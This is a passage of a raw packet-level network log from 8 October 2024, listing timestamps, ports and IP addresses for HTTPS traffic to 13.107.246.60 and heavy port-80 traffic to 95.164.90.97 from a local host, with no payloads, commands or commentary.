Oct 8, 2024 20:47:28.552580118 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.555263996 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.555304050 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.555393934 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.555535078 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.555541039 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.649651051 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.649840117 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.649916887 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.649921894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.649971008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.649977922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.649983883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650011063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.650038004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.650065899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650078058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650089025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650101900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650106907 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.650115967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.650147915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.650149107 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.650224924 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.650243044 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.650262117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650273085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650285006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650305033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650317907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.650321007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.650350094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.650361061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.653565884 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.653589010 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.653664112 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.653836966 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.653853893 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.674520969 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.674911976 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.674937963 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.675311089 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.675323009 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.760144949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760164976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760174990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760211945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760240078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760324955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760335922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760346889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760359049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760379076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760390043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760468006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760515928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760597944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760608912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760618925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760627985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760641098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760653019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760654926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760664940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760677099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.760689020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760698080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.760711908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.761010885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761022091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761032104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761043072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761054993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761064053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.761068106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761080027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761091948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.761095047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.761112928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.761137009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.803646088 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.803801060 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.803874969 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.803963900 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.803965092 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.804011106 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.804039001 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.806823969 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.806915045 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.807002068 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.807116032 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.807137966 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.869992018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870064974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870168924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870181084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870191097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870202065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870218992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870220900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870232105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870246887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870263100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870290041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870326996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870336056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870358944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870359898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870369911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870373964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870381117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870390892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870399952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870404005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870410919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870420933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870423079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870434999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870440960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870466948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870737076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870748043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870757103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870765924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.870776892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870793104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.870815992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871018887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871028900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871038914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871049881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871062040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871064901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871073008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871083975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871093988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871095896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871104956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871114016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871119022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871119022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871124983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871129990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871134043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871140003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871166945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871239901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871695042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871705055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871715069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871725082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871736050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871740103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871747971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871753931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871758938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871767044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871768951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871778965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871782064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871789932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.871814013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.871840000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.872169018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.872179031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.872189045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.872204065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.872205019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.872222900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.872251034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.980828047 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.981426954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981450081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981460094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981623888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981623888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981637001 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.981646061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981657982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981668949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981683016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981693983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981698990 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.981717110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981741905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981895924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981913090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981925011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981935978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981944084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981949091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981961012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981964111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981972933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981983900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.981991053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.981997013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982013941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982038021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982043028 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.982047081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982057095 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.982446909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982459068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982469082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982481003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982491970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982498884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982502937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982515097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982527018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982527971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982539892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982548952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982549906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982562065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982573032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982573032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982584953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982584953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982595921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982608080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982609034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982619047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982630968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982640028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982641935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982656002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.982673883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982681036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.982706070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983299017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983309031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983324051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983340979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983351946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983351946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983362913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983375072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983380079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983396053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983397961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983408928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983417988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983428001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983428955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983438969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983448982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983460903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983460903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983472109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983483076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983484030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983493090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983503103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983503103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983515024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.983525991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983546019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.983566999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984138966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984155893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984165907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984175920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984185934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984190941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984198093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984211922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984215975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984226942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984236956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984240055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984246016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984256983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984261036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984267950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984277964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984287977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984289885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984297991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984308958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984318972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984322071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984332085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984343052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984344006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984354019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.984363079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984390020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.984414101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985127926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985138893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985146999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985156059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985166073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985184908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985187054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985198021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985208035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985213995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985218048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985228062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985229015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985239029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985249996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985253096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985260010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985270977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985280991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985280991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985294104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985305071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985308886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985315084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985322952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985332966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985335112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985359907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985387087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.985969067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985980988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.985990047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.986022949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.986048937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.012684107 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.013396025 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.013434887 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.013674021 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.013686895 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.090059042 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.090186119 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.090388060 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.090540886 CEST	49811	443	192.168.2.5	13.107.246.60
